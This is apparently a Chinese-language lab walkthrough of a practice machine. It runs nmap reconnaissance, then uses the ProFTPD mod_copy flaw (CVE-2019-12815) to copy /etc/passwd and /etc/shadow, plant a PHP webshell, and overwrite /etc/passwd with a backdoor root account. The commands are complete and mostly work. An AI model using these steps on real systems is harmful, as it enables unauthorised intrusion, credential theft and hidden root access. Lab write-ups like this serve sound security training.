端口
nmap主机发现
nmap -sn 192.168.72.0/24
Nmap scan report for 192.168.72.171
Host is up (0.00020s latency).
171是新出现的机器,他就是靶机
nmap端口扫描
nmap -Pn 192.168.72.171 -p- --min-rate 10000 -oA nmap/scan
扫描开放端口保存到 nmap/scan下
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
这么多端口:995,993,465,143,587,110,25都是邮箱服务
445,139是samba服务
80,22,21是常见的端口
以下我对渗透测试优先级排名:
21,80,22尝试枚举足够多的敏感信息加渗透,然后再查看这三个端口是否有服务漏洞
445,139枚举敏感信息,查看是否有可利用的漏洞
邮件服务端口:是否有敏感信息
立足
21端口
upload页面发现信息:
directory文件:
drwxr-xr-x 18 patrick patrick 4096 Sep 23 19:40 .
drwxr-xr-x 4 root root 4096 Jan 6 2019 ..
-rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history
-rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc
drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache
drwx------ 10 patrick patrick 4096 Dec 26 2018 .config
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents
drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads
drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg
-rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha
-rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority
drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local
drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music
drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano
-rw-r--r-- 1 patrick patrick 0 Sep 23 19:40 PebAhabiNhV7N4eiwznehDQzCpydliND.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures
-rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public
-rw-r--r-- 1 patrick patrick 24 Sep 23 19:40 qbcN77aaMZMzCNKOTlq9jBMrIRO5DshbvdJH1emkdC3ZFTAE7GPCBhZSnljTXHor.txt
d--------- 2 root root 4096 Jan 9 2019 script
drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt
-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos
这是/home/patrick下的所有文件,其中确实有很多敏感内容
还有很多以project开头的文件,查看他们所有内容:
cat project*
This is a brave project!
colour
airline
skilled footballer!
Perhaps the head of development is secretly a sicko...
either a dog name, or the name of a lottery in singapore
ONE!
wine app
you only live once!
dog
cat
ant
bird
fish
hare
snake
mouse
eagle
rabbit
jaguar
python
penguin
peacock
phoenix
kangaroo
parakeet
mosquito
mousedeer
woodlouse
cockroach
kingfisher
rhinoceros
pondskater
一些名词,一般有三种推测:1.密码 2.用户名 3.没用
看后续场景是否能用到
80端口
是个开源的入侵检测系统,searchsploit 没发现0.8版本漏洞
交互的地方也比较少,看看url参数f是否有本地文件包含,最终结果当然没有,一般这种系统也不会出现这么低级错误
同时robots.txt页面什么敏感内容都没有
22端口
其报了三个错误,但都能使用参数解决
no matching key exchange method found. Their offer: diffie-hellman-group1-sha1
no matching host key type found. Their offer: ssh-rsa,ssh-dss
no matching cipher found. Their offer: aes128-cbc,blowfish-cbc,twofish-cbc,3des-cbc
ssh 192.168.72.171 -oKexAlgorithms=diffie-hellman-group1-sha1 -oHostKeyAlgorithms=ssh-rsa,ssh-dss -c aes128-cbc
但是又出现一个错误,明显是作者故意而为之:
Connection reset by 192.168.72.171 port 22
22端口连接不了
21端口服务漏洞
按照我们的思路接下来查看21,80,22是否有服务漏洞
21端口ProFTPD 是1.2.10版本,我们着重挑选1.2.10的版本后的漏洞,我注意到了
1.3.5版本有个file copy的漏洞:看了poc得知,这了漏洞是未授权的敏感文件读写,那么影响力一定很大
果不其然我查到了这篇文章:https://gbhackers.com/proftpd-file-copy-vulnerability/
文章标题:ProFTPD 的文件复制漏洞使超过 100 万台服务器面临风险
引用文章里的某些话:
ProFTPD 服务器中的文件复制漏洞允许匿名远程攻击者在易受攻击的机器上执行代码,从而导致无需身份验证的远程代码执行和信息泄露。
利用此漏洞,攻击者可以运行具有 Pro-FTPd 服务权限的任何程序代码。此漏洞的编号为CVE-2019-12815,影响 1.3.5b 及以下所有版本。
那我们就能尝试一下此漏洞
nc 192.168.72.171 21
220 The Good Tech Inc. FTP Server
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto /home/ftp/passwd
250 Copy successful
site cpfr /etc/shadow
350 File or directory exists, ready for destination name
site cpto /home/ftp/shadow
250 Copy successful
敏感文件先copy过来,但是ssh关闭的,我们只能尝试上传一个shell
为了上传webshell,我们直接把/var/www拷贝过来,目的是能够上传到正确的目录
220 The Good Tech Inc. FTP Server
site cpfr /var/www
350 File or directory exists, ready for destination name
site cpto /home/ftp/www
250 Copy successful
发现web主目录如下:
/var/www/tryingharderisjoy/ossec
我们直接上传php的webshell
先将shell传给ftp
put shell.php
然后拷贝shell.php到web目录
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/shell.php
350 File or directory exists, ready for destination name
site cpto /var/www/tryingharderisjoy/shell.php
250 Copy successful
点击即可getshell
提权
生成密码
openssl passwd -1 -salt hack hack123
生成一个hack123 md5加密的密码hash,然后盐值为hack再加密一次
构造字符串追加到passwd
echo "hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0:root:/root:/bin/bash" >> passwd
上传至ftp并覆盖/etc/passwd
put passwd
nc 192.168.72.171
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/upload/passwd
350 File or directory exists, ready for destination name
site cpto /etc/passwd
250 Copy successful
覆盖后
su hack
password:hack123
成为root
root@JOY:~# id
id
uid=0(root) gid=0(root) groups=0(root)